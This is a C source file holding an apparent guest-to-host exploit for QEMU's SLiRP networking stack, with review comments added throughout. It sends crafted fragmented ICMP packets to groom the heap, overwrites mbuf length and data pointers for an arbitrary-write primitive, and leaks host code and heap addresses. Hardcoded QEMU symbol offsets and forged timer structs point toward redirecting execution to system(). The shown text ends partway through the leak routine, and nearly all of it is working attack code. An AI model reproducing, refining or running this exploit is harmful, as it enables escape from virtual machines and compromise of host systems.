
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/types.h>

#include <arpa/inet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/ip.h>

#include <linux/icmp.h>
#include <linux/if_packet.h>
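/*
 * Report the last errno value prefixed with x and abort the run.
 * The do { } while (0) wrapper carries NO trailing semicolon, so that
 * `if (cond) die("x"); else ...` parses as a single statement; the
 * original definition ended in `while(0);` which breaks that pattern.
 */
#define die(x) do { \
    perror(x); \
    exit(EXIT_FAILURE); \
} while (0)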
// * * * * * * * * * * * * * * * Constants * * * * * * * * * * * * * * * * * *

/* Source (guest) and destination (gateway) addresses stamped into every
 * crafted IPv4 header by send_ip4(). 10.0.2.15 / 10.0.2.2 are presumably the
 * defaults of QEMU's user-mode (SLiRP) network — adjust if the guest runs with
 * a different -netdev user address range. */
#define SRC_ADDR "10.0.2.15"
#define DST_ADDR "10.0.2.2"

/* Guest NIC the raw AF_PACKET frames are injected on (looked up in initialize()). */
#define INTERFACE "ens3"

#define ETH_HDRLEN 14 // Ethernet header length
#define IP4_HDRLEN 20 // IPv4 header length, no options
#define ICMP_HDRLEN 8 // ICMP header length for echo request, excludes data
/* Not referenced by the helpers visible in this part of the file; the sender
 * that consumes it decides its meaning — confirm there before changing it. */
#define MIN_MTU 12000

// * * * * * * * * * * * * * * * QEMU Symbol offset * * * * * * * * * * * * * * * * * *

/* Build-specific symbol offsets, presumably relative to the qemu-system
 * binary's load base (cf. the code_leak global). They are only valid for the
 * exact QEMU build they were extracted from and must be regenerated for any
 * other binary. */
#define SYSTEM_PLT 0x029b290
#define QEMU_CLOCK 0x10e8200
#define QEMU_TIMER_NOTIFY_CB 0x2f4bff
#define MAIN_LOOP_TLG 0x10e81e0
#define CPU_UPDATE_STATE 0x488190

// Some place in bss which is not used to craft fake structs
#define FAKE_STRUCT 0xf43360
// * * * * * * * * * * * * * * * QEMU Structs * * * * * * * * * * * * * * * * * *

/*
 * Local mirror of SLiRP's struct mbuf. Presumably used to lay out fake objects
 * in memory the exploit controls (cf. FAKE_STRUCT), so field order, sizes and
 * padding must match the targeted QEMU build byte for byte — confirm against
 * the same binary the symbol offsets above were taken from.
 */
struct mbuf {
    struct mbuf *m_next; /* Linked list of mbufs */
    struct mbuf *m_prev;
    struct mbuf *m_nextpkt; /* Next packet in queue/record */
    struct mbuf *m_prevpkt; /* Flags aren't used in the output queue */
    int m_flags; /* Misc flags */

    int m_size; /* Size of mbuf, from m_dat or m_ext */
    struct socket *m_so;

    char * m_data; /* Current location of data */
    int m_len; /* Amount of data in this mbuf, from m_data */

    void *slirp;
    char resolution_requested;
    u_int64_t expiration_date;
    char *m_ext;
    /* start of dynamic buffer area, must be last element */
    /* NOTE(review): declared as a pointer, while the comment above describes
     * the start of an inline buffer. If the real struct ends in a flexible
     * array member this adds 8 bytes to sizeof(struct mbuf); verify which
     * layout the exploit relies on before using sizeof/offsetof of this field. */
    char * m_dat;
};
/*
 * Mirror of QEMU's QEMUTimer for the targeted build. NOTE(review): how the
 * exploit fills this in is outside this part of the file; presumably cb and
 * opaque are what a forged timer at FAKE_STRUCT gets pointed at (cf.
 * SYSTEM_PLT), so the field order must match the binary exactly — confirm.
 */
struct QEMUTimer {
    int64_t expire_time; /* in nanoseconds */
    void *timer_list;
    void *cb;
    void *opaque;
    void *next;
    int scale;
};
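/*
 * Mirror of QEMU's QEMUTimerList for the targeted build. active_timers_lock
 * is kept as an opaque 0x38-byte blob (presumably standing in for the lock
 * object) purely so that the fields after it land at the same offsets as in
 * the binary. The two list-link members were lifted from QEMU's QLIST_ENTRY
 * macro; the stray line-continuation backslashes that came along with them
 * are dropped here — outside a macro they only spliced the next declaration
 * onto the same logical line.
 */
struct QEMUTimerList {
    void *clock;
    char active_timers_lock[0x38];
    struct QEMUTimer *active_timers;
    struct QEMUTimerList *le_next;   /* next element */
    struct QEMUTimerList **le_prev;  /* address of previous next element */
    void *notify_cb;
    void *notify_opaque;

    /* lightweight method to mark the end of timerlist's running */
    size_t timers_done_ev;
};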
// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *

int raw_socket;   /* AF_PACKET socket every frame is written to (send_pkt) */
int recv_socket;  /* not referenced by the helpers visible here; used later in the file */
int spray_id;     /* not referenced by the helpers visible here; used later in the file */
int idx;          /* ifindex of INTERFACE, passed as sll_ifindex by send_pkt */
char mac[6];      /* source MAC placed in each Ethernet header and sockaddr_ll */

/* Leaked addresses; set and consumed outside the helpers shown here. */
void * code_leak;
void * heap_leak;
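/*
 * Zero-filled allocation of size bytes that never returns NULL: on failure
 * the run is aborted through die(). The caller owns the result and frees it
 * with free(). The failure message now names calloc(), the call that is
 * actually made.
 */
void *Malloc(size_t size) {
    void *ptr = calloc(size, 1);

    if (ptr == NULL) {
        die("calloc() failed to allocate");
    }
    return ptr;
}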
unsigned short in_cksum(unsigned short *ptr,int nbytes) {
|
|
|
|
register long sum; /* assumes long == 32 bits */
|
|
u_short oddbyte;
|
|
register u_short answer; /* assumes u_short == 16 bits */
|
|
|
|
/*
|
|
* Our algorithm is simple, using a 32-bit accumulator (sum),
|
|
* we add sequential 16-bit words to it, and at the end, fold back
|
|
* all the carry bits from the top 16 bits into the lower 16 bits.
|
|
*/
|
|
|
|
sum = 0;
|
|
while (nbytes > 1) {
|
|
sum += *ptr++;
|
|
nbytes -= 2;
|
|
}
|
|
|
|
/* mop up an odd byte, if necessary */
|
|
if (nbytes == 1) {
|
|
oddbyte = 0; /* make sure top half is zero */
|
|
*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */
|
|
sum += oddbyte;
|
|
}
|
|
|
|
/*
|
|
* Add back carry outs from top 16 bits to low 16 bits.
|
|
*/
|
|
|
|
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
|
|
sum += (sum >> 16); /* add carry */
|
|
answer = ~sum; /* ones-complement, then truncate to 16 bits */
|
|
return(answer);
|
|
}
|
|
|
|
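/*
 * Print len bytes at addr as a 16-bytes-per-line hex + ASCII dump on stdout,
 * preceded by desc on its own line when desc is non-NULL. Bytes outside
 * 0x20..0x7e are shown as '.' in the ASCII column; the last line is padded so
 * that column stays aligned. With len <= 0 or addr == NULL only the
 * description is printed — the original printed an uninitialized ASCII buffer
 * for an empty dump and dereferenced a NULL addr.
 */
void hex_dump(const char *desc, const void *addr, int len)
{
    const unsigned char *pc = (const unsigned char *)addr;
    unsigned char ascii[17]; /* up to 16 characters plus NUL */
    int i;

    if (desc != NULL)
        printf("%s:\n", desc);
    if (len <= 0 || addr == NULL)
        return;

    for (i = 0; i < len; i++) {
        if ((i % 16) == 0) {
            if (i != 0)
                printf(" %s\n", ascii); /* flush the previous line's ASCII column */
            printf(" %04x ", i);
        }
        printf(" %02x", pc[i]);
        ascii[i % 16] = (pc[i] < 0x20 || pc[i] > 0x7e) ? '.' : pc[i];
        ascii[(i % 16) + 1] = '\0';
    }

    /* each missing byte is the width of " %02x" */
    while ((i % 16) != 0) {
        printf("   ");
        i++;
    }
    printf(" %s\n", ascii);
}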
/*
 * Fill the 14-byte Ethernet header at eth_hdr: source MAC from the global
 * mac[] (52:54:00:12:34:56 is what a default QEMU guest NIC carries, but the
 * value comes from mac[] at runtime) and EtherType IPv4 in network byte order.
 * The destination MAC in bytes 0..5 is left exactly as the caller provided it;
 * the callers in this file hand in a zeroed buffer from Malloc().
 * Returns eth_hdr so the call can be chained.
 */
char *ethernet_header(char *eth_hdr) {
    const unsigned short ethertype = ETH_P_IP;

    memcpy(eth_hdr + 6, mac, 6);

    /* EtherType, big-endian (IANA ethernet-numbers registry) */
    eth_hdr[12] = (char)(ethertype >> 8);
    eth_hdr[13] = (char)(ethertype & 0xff);

    return eth_hdr;
}
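/*
 * Fill an IPv4 header without options at ip. payload_len is the number of
 * bytes that follow the 20-byte header; src_addr/dst_addr are already in
 * network byte order (inet_addr() output); id and frag_off are host-order and
 * are converted here, so frag_off is the RFC 791 word with the flag bits in
 * its top three bits. The header checksum is computed last over the header
 * with its check field cleared — the field is explicitly zeroed first so the
 * result no longer depends on the caller passing a freshly calloc'd buffer.
 */
void ip_header(struct iphdr *ip, u_int32_t src_addr, u_int32_t dst_addr, u_int16_t payload_len,
               u_int8_t protocol, u_int16_t id, uint16_t frag_off) {

    /* rfc791 */
    ip->ihl = IP4_HDRLEN / sizeof(uint32_t);
    ip->version = 4;
    ip->tos = 0x0;
    /* 16-bit field: a payload_len above 65515 would wrap tot_len */
    ip->tot_len = htons(IP4_HDRLEN + payload_len);
    ip->id = htons(id);
    ip->ttl = 64;
    ip->frag_off = htons(frag_off);
    ip->protocol = protocol;
    ip->saddr = src_addr;
    ip->daddr = dst_addr;

    ip->check = 0;
    ip->check = in_cksum((unsigned short *)ip, IP4_HDRLEN);
}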
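/*
 * Build an ICMP echo request (RFC 792) at `icmp` with id 0 / sequence 0,
 * followed by `size` payload bytes copied from `data` straight after the
 * ICMP_HDRLEN-byte header.  The caller's buffer must hold at least
 * ICMP_HDRLEN + size bytes.
 *
 * The checksum is computed over header + payload, so every summed byte has
 * to be defined: the checksum field is cleared first, and when `data` is
 * NULL with a non-zero `size` the payload area is zero-filled instead of
 * being summed as-is.  (The visible callers pass either a buffer or
 * size 0, so this only changes the previously undefined case.)
 */
void icmp_header(struct icmphdr *icmp, const char *data, size_t size) {
    char *payload = (char *)icmp + ICMP_HDRLEN;

    icmp->type = ICMP_ECHO;
    icmp->code = 0;
    icmp->un.echo.id = htons(0);
    icmp->un.echo.sequence = htons(0);

    if (size > 0) {
        if (data)
            memcpy(payload, data, size);
        else
            memset(payload, 0, size);
    }

    icmp->checksum = 0;                     /* must be zero while summing */
    icmp->checksum = in_cksum((unsigned short *)icmp, ICMP_HDRLEN + size);
}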
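/*
 * Hand one complete Ethernet frame (`frame`, `frame_length` bytes) to the
 * PF_PACKET raw socket `raw_socket` opened by initialize(), addressed to
 * interface index `idx`.  Calls die() if sendto() fails.
 *
 * The sockaddr_ll is fully initialised.  The original only set family,
 * ifindex, halen and addr, leaving sll_protocol / sll_hatype / sll_pkttype
 * as whatever happened to be on the stack; packet(7) says the fields not
 * needed for sending should be 0 and sll_protocol should be set, so it is
 * set to the EtherType every frame here carries (ETH_P_IP).  sll_addr
 * still holds our own MAC, as before.
 */
void send_pkt(char *frame, uint32_t frame_length) {
    struct sockaddr_ll sock = {
        .sll_family   = AF_PACKET,
        .sll_protocol = htons(ETH_P_IP),
        .sll_ifindex  = idx,
        .sll_halen    = 6,
    };
    memcpy(sock.sll_addr, mac, 6 * sizeof(uint8_t));

    if (sendto(raw_socket, frame, frame_length, 0,
               (struct sockaddr *)&sock, sizeof(sock)) < 0)
        die("sendto()");
}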
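/*
 * Send one IPv4 datagram or fragment from SRC_ADDR to DST_ADDR carrying
 * `size` bytes of `data` as ICMP, with IP id `id` and fragment word
 * `frag_off` (IP_MF and/or an 8-byte-unit offset, host order).
 *
 * `data` may be NULL, in which case the payload area is left as the
 * zero-filled buffer.  `size` is truncated to 16 bits, like the IP length
 * field; a size that would not fit the IP_MAXPACKET frame buffer is fatal
 * (die()) rather than an out-of-bounds memcpy in this process.
 *
 * The frame buffer is zeroed after allocation, so the destination MAC
 * (which ethernet_header() does not set) and any payload not covered by
 * `data` go out as zeros instead of whatever Malloc() returned.
 */
void send_ip4(uint32_t id, uint32_t size, char * data, uint16_t frag_off) {
    uint16_t payload_len = (uint16_t)size;

    if ((size_t)ETH_HDRLEN + IP4_HDRLEN + payload_len > IP_MAXPACKET)
        die("send_ip4(): payload does not fit the frame buffer");

    uint32_t src_addr = inet_addr(SRC_ADDR);
    uint32_t dst_addr = inet_addr(DST_ADDR);

    char * pkt = Malloc(IP_MAXPACKET);
    memset(pkt, 0, IP_MAXPACKET);
    struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);

    ethernet_header(pkt);
    ip_header(ip, src_addr, dst_addr, payload_len, IPPROTO_ICMP, id, frag_off);

    if (data) {
        char * payload = pkt + ETH_HDRLEN + IP4_HDRLEN;
        memcpy(payload, data, payload_len);
    }

    uint32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + payload_len;
    send_pkt(pkt, frame_length);
    free(pkt);
}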
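/*
 * Send one ICMP echo fragment: an ICMP header plus `size` payload bytes,
 * wrapped by send_ip4() with IP id `id` and fragment word `frag_off`.
 * When `data` is NULL the payload is `size` zero bytes.
 *
 * Two fixes over the original: the scratch payload it allocated for the
 * NULL-data case was never freed (one leak per sprayed fragment), and the
 * packet buffer went out holding whatever Malloc() returned.  The buffer
 * is now zeroed once, which also covers the NULL-data payload, so no
 * separate allocation is needed.  A size that does not fit the buffer is
 * fatal instead of overflowing it.
 */
void send_icmp(uint32_t id, uint32_t size, char * data, uint16_t frag_off) {
    if ((size_t)ICMP_HDRLEN + size > IP_MAXPACKET)
        die("send_icmp(): payload does not fit the packet buffer");

    char * pkt = Malloc(IP_MAXPACKET);
    memset(pkt, 0, IP_MAXPACKET);
    struct icmphdr * icmp = (struct icmphdr * )pkt;

    /* With the buffer zeroed, a NULL data pointer yields a zero payload. */
    icmp_header(icmp, data, size);

    uint32_t len = ICMP_HDRLEN + size;
    send_ip4(id, len, pkt, frag_off);
    free(pkt);
}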
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
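/*
 * One-time setup.  Seeds rand(), looks up INTERFACE's MTU, MAC address
 * and index through ioctl() on a throw-away socket, then opens the
 * PF_PACKET raw socket (global `raw_socket`) bound to that interface.
 * Fills the globals `mac` and `idx` that ethernet_header() and
 * send_pkt() use.
 *
 * Dies if the MTU is below MIN_MTU, after printing the `ip link set`
 * command that raises it: the exploit later sends a 0xC90-byte fragment
 * in one frame.  The PF_PACKET socket needs CAP_NET_RAW.
 *
 * All name copies are bounded.  The original strcpy()'d INTERFACE into a
 * 40-byte local and then into ifr.ifr_name, which is only IFNAMSIZ (16)
 * bytes, so any interface name of 16 or more characters overflowed the
 * ifreq on the stack.  SO_BINDTODEVICE is now given the interface name
 * string it is documented to take (socket(7)) rather than the whole
 * struct ifreq, which only worked because ifr_name is its first member.
 */
void initialize() {
    int sd;
    struct ifreq ifr;
    char interface[40];
    int mtu;

    srand(time(NULL));
    snprintf(interface, sizeof(interface), "%s", INTERFACE);

    /* Throw-away socket for the ioctl() lookups below. */
    if ((sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        die("socket() failed to get socket descriptor for using ioctl()");
    }

    /* MTU */
    memset(&ifr, 0, sizeof(ifr));
    snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface);
    if (ioctl(sd, SIOCGIFMTU, &ifr) < 0) {
        die("ioctl() failed to get MTU ");
    }
    mtu = ifr.ifr_mtu;
    printf("MTU of interface %s : %i\n", interface, mtu);
    if (mtu < MIN_MTU) {
        printf("Run\n$ ip link set dev %s mtu 12000\n", interface);
        die("");
    }

    /* MAC address -> global mac[] */
    memset(&ifr, 0, sizeof(ifr));
    snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface);
    if (ioctl(sd, SIOCGIFHWADDR, &ifr) < 0) {
        die("ioctl() failed to get source MAC address ");
    }
    memcpy(mac, ifr.ifr_hwaddr.sa_data, 6 * sizeof(uint8_t));
    printf("MAC %s :", interface);
    for (int i = 0; i < 5; i++) {
        printf("%02x:", mac[i]);
    }
    printf("%02x\n", mac[5]);

    /* Interface index -> global idx; sendto() on PF_PACKET needs it. */
    memset(&ifr, 0, sizeof(ifr));
    snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface);
    if (ioctl(sd, SIOCGIFINDEX, &ifr) < 0) {
        die("ioctl() failed to find interface ");
    }
    close(sd);
    printf("Index for interface %s : %i\n", interface, ifr.ifr_ifindex);
    idx = ifr.ifr_ifindex;

    /* The socket every frame is sent on. */
    if ((raw_socket = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) == -1)
        die("socket() failed to obtain raw socket");

    /* Bind it to the interface by name (ifr.ifr_name still holds it). */
    if (setsockopt(raw_socket, SOL_SOCKET, SO_BINDTODEVICE,
                   ifr.ifr_name, (socklen_t)(strlen(ifr.ifr_name) + 1)) < 0) {
        die("setsockopt() failed to bind to interface ");
    }

    printf("Initialized socket discriptors\n");
}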
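/*
 * Heap-groom helper: send `count` ICMP fragments of `size` payload bytes
 * each, with consecutive IP ids starting at the global `spray_id`, all
 * flagged IP_MF so that none of them ever completes reassembly.  Each one
 * presumably stays queued on the target's fragment list, holding a
 * buffer whose size is set by `size`; the callers rely on that layout.
 *
 * Removed three unused locals (s, frag_off, data) and the signed-vs-
 * unsigned loop comparison of the original.
 */
void spray(uint32_t size, uint32_t count) {
    printf("Spraying 0x%x x ICMP[0x%x]\n", count, size);

    for (uint32_t i = 0; i < count; i++) {
        send_icmp(spray_id + i, size, NULL, IP_MF);
    }
}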
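/*
 * Arbitrary-write primitive: deliver `size` bytes of `payload` to address
 * `addr` in the target (QEMU) process.
 *
 *   addrlen      how many low-order bytes of `addr` to splice into the
 *                victim's data pointer: 3 = only the low 24 bits (used
 *                before any heap address is known), 8 = the full pointer.
 *   spray_count  number of 8-byte fragments for the initial spray.
 *
 * Consumes spray_count + 8 consecutive IP ids from the global `spray_id`;
 * callers re-seed spray_id between calls.  `size` is truncated to 16 bits
 * by send_ip4().
 *
 * Sequence.  The fragment sizes/offsets are what the code does; what they
 * do to the target's mbufs is what the original comments say and is not
 * verifiable from this file:
 *
 *   spray                 spray_count 8-byte MF fragments.
 *   target                8-byte MF fragment whose buffer gets redirected.
 *   padding x2, hole_1, padding 0xC30, hole_2, anti-consolidation
 *                         more never-completed fragments shaping the heap.
 *   complete hole_1/2     frag_off 1 with MF clear finishes those two
 *                         datagrams, presumably freeing them -> two holes.
 *   vuln fragment pair    a 0xC90-byte MF fragment and an 8-byte one at
 *                         offset 0x192 (x8 = 0xC90, directly after it, MF
 *                         clear) complete a 0xC98-byte datagram.  Its IP
 *                         source field is m_len (negative) and the
 *                         destination is 0; per the original comments
 *                         these overwrite the target mbuf's m_len.
 *   target, offset 1, MF  with that negative m_len the append underflows
 *                         and addr_buf (addr right-aligned in 8 bytes)
 *                         overwrites the target's m_data.
 *   target, offset 2      the last fragment's data, `payload`, is copied
 *                         through the redirected m_data, i.e. to `addr`.
 *
 * The -0x70 / addrlen arithmetic shifts `addr` and m_len together so the
 * last addrlen bytes of the 8-byte fragment land exactly on the pointer.
 *
 * Fixes: the trigger buffer `pkt` was never freed; addrlen > 8 would index
 * addr_buf with a negative offset and is now rejected.
 */
void arbitrary_write(void *addr, size_t addrlen, char *payload, size_t size,
                     size_t spray_count) {
    if (addrlen > 0x8)
        die("arbitrary_write(): addrlen must be <= 8");

    spray(0x8, spray_count);

    size_t id = spray_id + spray_count;

    // Target
    size_t target_id = id++;
    send_ip4(target_id, 0x8, NULL, IP_MF);

    // Padding
    send_ip4(id++, 0x8, NULL, IP_MF);
    send_ip4(id++, 0x8, NULL, IP_MF);

    // Pivot point
    size_t hole_1 = id++;
    send_ip4(hole_1, 0x8, NULL, IP_MF);

    // Padding
    send_ip4(id++, 0xC30, NULL, IP_MF);

    // For creating hole
    size_t hole_2 = id++;
    send_ip4(hole_2, 0x8, NULL, IP_MF);

    // To prevent consolidation
    send_ip4(id++, 0x8, NULL, IP_MF);

    // This should create the first hole
    send_ip4(hole_1, 0x8, NULL, 0x1);

    // This should create the second hole
    send_ip4(hole_2, 0x8, NULL, 0x1);

    // Negative m_len for the target; addr moves up by 0x70 - addrlen so the
    // splice below hits the pointer, and m_len absorbs the 8 - addrlen
    // bytes of addr_buf that are not part of the address (0 when addrlen
    // is 8, which is what the original's conditional also produced).
    int m_data_off = -0x70;
    int m_len = m_data_off;
    addr = (void *)((size_t)addr + ((m_len * -1) - addrlen));
    m_len -= (int)(0x8 - addrlen);

    size_t vuln_id = id++;

    char * pkt = Malloc(IP_MAXPACKET);
    memset(pkt, 0x0, IP_MAXPACKET);
    struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);

    // First half of the trigger datagram: 0xC90 bytes, source field = m_len.
    uint16_t pkt_len = 0xc90;
    ip_header(ip, m_len, 0x0, pkt_len, IPPROTO_ICMP, vuln_id, IP_MF);
    uint32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;

    // The mbuf of this packet will be placed in the second hole and
    // m_ext buff will be placed on the first hole. We will write wrt
    // to this.
    send_pkt(pkt, frame_length);

    // Second half: 8 bytes at offset 0x192 (*8 = 0xC90), MF clear.
    memset(pkt, 0x0, IP_MAXPACKET);
    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);
    pkt_len = 0x8;
    ip_header(ip, m_len, 0x0, pkt_len, IPPROTO_ICMP, vuln_id, 0x192);
    frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;

    // Trigger the bug to change target's m_len
    send_pkt(pkt, frame_length);
    free(pkt);

    // Underflow and write, to change m_data: addr occupies the last
    // addrlen bytes of an 8-byte fragment (all 8 when addrlen == 8).
    char addr_buf[0x8] = {0};
    memcpy(&addr_buf[0x8 - addrlen], (char *)&addr, addrlen);
    send_ip4(target_id, 0x8, addr_buf, 0x1 | IP_MF);

    // Final fragment: its data goes through the redirected m_data.
    send_ip4(target_id, size, payload, 0x2);

    hex_dump("Writing Payload ", payload, size);
}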
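/*
 * Block on `recv_socket` (PF_PACKET, all protocols) until an IPv4 ICMP
 * echo reply whose checksum field reads 0xffff arrives, then pull two
 * host pointers out of it into the globals:
 *
 *   code_leak  the qword at frame offset 0x40 minus CPU_UPDATE_STATE
 *              (i.e. a QEMU code pointer rebased to the image start);
 *   heap_leak  the first qword from offset 0x30 on whose bits 40..46 are
 *              all set (a 0x7f.... user-space pointer), masked down to a
 *              16 MiB boundary.
 *
 * Why that reply carries host memory is arranged in leak(); this routine
 * only parses.  Frames that fail the filter are ignored and the loop keeps
 * listening.  Globals are left untouched when nothing qualifies (heap_leak
 * in particular stays as it was if no 0x7f pointer is found).
 *
 * Changes from the original: a recvfrom() timeout (EAGAIN) now restarts
 * the loop instead of falling through and parsing the empty buffer with a
 * negative length; a frame too short for Ethernet+IPv4+ICMP headers is
 * skipped instead of having those headers read from zero padding; the
 * EtherType is assembled from unsigned bytes; the 0x40 read and the
 * pointer scan are bounded by the bytes actually received (the old loop
 * could run 0x30 bytes past them) and use memcpy rather than unaligned
 * casts; fromlen is a socklen_t.
 */
void recv_leaks(){
    int bytes, err;
    struct sockaddr from;
    socklen_t fromlen;
    char recv_ether_frame[IP_MAXPACKET];
    struct iphdr *recv_iphdr = (struct iphdr *)(recv_ether_frame + ETH_HDRLEN);
    struct icmphdr *recv_icmphdr =
        (struct icmphdr *)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN);
    const int min_len = ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN;

    for (;;) {
        memset(recv_ether_frame, 0, sizeof(recv_ether_frame));
        memset(&from, 0, sizeof(from));
        fromlen = sizeof(from);

        bytes = recvfrom(recv_socket, recv_ether_frame, IP_MAXPACKET, 0,
                         &from, &fromlen);
        if (bytes < 0) {
            err = errno;
            if (err == EAGAIN) {            /* receive timeout, if one is set */
                printf("Time out\n");
                continue;
            } else if (err == EINTR) {      /* interrupted; keep listening */
                continue;
            } else {
                perror("recvfrom() failed ");
                exit(EXIT_FAILURE);
            }
        }

        /* All three headers must be present before they are inspected. */
        if (bytes < min_len)
            continue;

        const unsigned char *eth = (const unsigned char *)recv_ether_frame;
        int ethertype = (eth[12] << 8) | eth[13];

        /* Only an IPv4 ICMP echo reply with checksum 0xffff is of interest. */
        if (ethertype != ETH_P_IP ||
            recv_iphdr->protocol != IPPROTO_ICMP ||
            recv_icmphdr->type != ICMP_ECHOREPLY || recv_icmphdr->code != 0 ||
            recv_icmphdr->checksum != 0xffff)
            continue;

        hex_dump("Recieved ICMP Replay : ", recv_ether_frame, bytes);

        if (bytes >= 0x40 + (int)sizeof(size_t)) {
            size_t raw;
            memcpy(&raw, recv_ether_frame + 0x40, sizeof(raw));
            code_leak = (void *)(raw - CPU_UPDATE_STATE);
        }

        /* Scan the qwords from offset 0x30 within the received bytes. */
        for (int off = 0x30; off + (int)sizeof(size_t) <= bytes; off += (int)sizeof(size_t)) {
            size_t v;
            memcpy(&v, recv_ether_frame + off, sizeof(v));
            if ((v & 0x7f0000000000) == 0x7f0000000000) {
                heap_leak = (void *)(v & 0xffffff000000);
                break;
            }
        }

        printf("Host Code Leak : %p\n", code_leak);
        printf("Host Heap Leak : %p\n", heap_leak);
        break;
    }
}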
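/*
 * Stage 1: obtain a QEMU code pointer and a heap pointer from the host.
 *
 * Outline.  The fragment sizes, ids and offsets are what the code sends;
 * their effect on the target's mbufs is taken from the original comments
 * and cannot be checked from this file:
 *
 *  1. Build a template ICMP echo request (Ethernet + IPv4 + ICMP, no
 *     payload) and flip its IP length/id/offset back to host order with
 *     tot_len reduced by the header length -- presumably the form a parsed
 *     header has inside the target.  arbitrary_write() plants it (plus 4
 *     trailing bytes) at heap offset 0xb00-0x20 using a 3-byte address,
 *     i.e. only the low 24 bits of the victim's data pointer change, so
 *     no heap address is needed yet.
 *  2. Groom again: a 0x100-byte "replay" fragment, then the same target /
 *     padding / hole sequence as arbitrary_write(), then the same
 *     0xC90 + 8-byte fragment pair that triggers the overflow, this time
 *     with m_len = -0xd50 (minus the 8 - 3 address-alignment bytes).
 *  3. Complete the target datagram with one 8-byte fragment whose last 3
 *     bytes are 0xb00-0x20+ETH_HDRLEN+0xe+6, redirecting its data pointer
 *     at the ICMP part of the planted template.
 *  4. Open recv_socket BEFORE completing the replay datagram so that the
 *     echo reply the template provokes is captured; recv_leaks() parses
 *     code_leak and heap_leak out of that reply.
 *  5. Zero 0x28 bytes at heap_leak + 0xb00-0x20 to undo the plant.
 *
 * Note: the template buffer is not cleared after Malloc(), so the 4 bytes
 * written past the ICMP header (and the destination MAC) are whatever
 * Malloc() returns; this is kept as in the original in case the reply
 * depends on it -- verify against the Malloc() wrapper.
 *
 * Fixes: the unused `data` local is gone, and `pkt` (the template, later
 * reused as the trigger-frame scratch buffer) is freed; it used to leak.
 */
void leak() {
    uint32_t src_addr, dst_addr;
    src_addr = inet_addr(SRC_ADDR);
    dst_addr = inet_addr(DST_ADDR);

    /* Crafting Fake ICMP Packet For Leak */
    char * pkt = Malloc(IP_MAXPACKET);
    struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    struct icmphdr * icmp = (struct icmphdr * )(pkt + ETH_HDRLEN + IP4_HDRLEN);
    ethernet_header(pkt);
    ip_header(ip, src_addr, dst_addr, ICMP_HDRLEN, IPPROTO_ICMP, 0xbabe, IP_MF);

    /* Back to host order, as an already-parsed header would look (step 1). */
    ip->tot_len = ntohs(ip->tot_len) - IP4_HDRLEN;
    ip->id = ntohs(ip->id);
    ip->frag_off = htons(ip->frag_off);     /* byte swap back; same as ntohs */

    icmp_header(icmp, NULL, 0x0);
    size_t pkt_len = ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN;

    /* Plant the template using the 3-byte (low 24 bits) address form. */
    spray_id = rand() & 0xffff;
    arbitrary_write((void * )(0xb00 - 0x20), 3, pkt, pkt_len + 4, 0x100);

    // This is the same groom as the arbitrary write function, with one
    // extra "replay" datagram in front of the target.
    spray_id = rand() & 0xffff;
    spray(0x8, 0x20);
    size_t id = spray_id + 0x20;

    size_t replay_id = id++;
    send_ip4(replay_id, 0x100, NULL, IP_MF);

    // Target
    size_t target_id = id++;
    send_ip4(target_id, 0x8, NULL, IP_MF);

    // Padding
    send_ip4(id++, 0x8, NULL, IP_MF);
    send_ip4(id++, 0x8, NULL, IP_MF);

    // Pivot point
    size_t hole_1 = id++;
    send_ip4(hole_1, 0x8, NULL, IP_MF);

    // Padding
    send_ip4(id++, 0xC30, NULL, IP_MF);

    // For creating hole
    size_t hole_2 = id++;
    send_ip4(hole_2, 0x8, NULL, IP_MF);

    // Prevent consolidation
    send_ip4(id++, 0x8, NULL, IP_MF);

    // This should create the first hole
    send_ip4(hole_1, 0x8, NULL, 0x1);

    // This should create the second hole
    send_ip4(hole_2, 0x8, NULL, 0x1);

    // Trigger the bug to change target's m_len: -0xd50 here (vs -0x70 in
    // arbitrary_write), adjusted for the 3-byte address like there.
    int m_data_off = -0xd50;
    int m_len = m_data_off;
    size_t * addr = (size_t * )(0xb00 - 0x20 + ETH_HDRLEN + 0xe + 6);
    size_t addrlen = 0x3;

    if (addrlen != 0x8) {
        m_len -= (0x8 - addrlen);
    }

    size_t vuln_id = id++;

    memset(pkt, 0x0, IP_MAXPACKET);
    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);

    pkt_len = 0xc90;
    ip_header(ip, m_len, 0x0, pkt_len, IPPROTO_ICMP, vuln_id, IP_MF);
    uint32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
    send_pkt(pkt, frame_length);

    memset(pkt, 0x0, IP_MAXPACKET);
    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);
    pkt_len = 0x8;
    ip_header(ip, m_len, 0x0, pkt_len, IPPROTO_ICMP, vuln_id, 0x192);
    frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
    send_pkt(pkt, frame_length);

    // Underflow and write to change m_data (step 3); this completes the
    // target datagram (no MF) rather than leaving it open.
    char addr_buf[0x8] = {0};
    if (addrlen != 0x8) {
        memcpy(&addr_buf[(0x8 - addrlen)], (char *)&addr, addrlen);
    } else {
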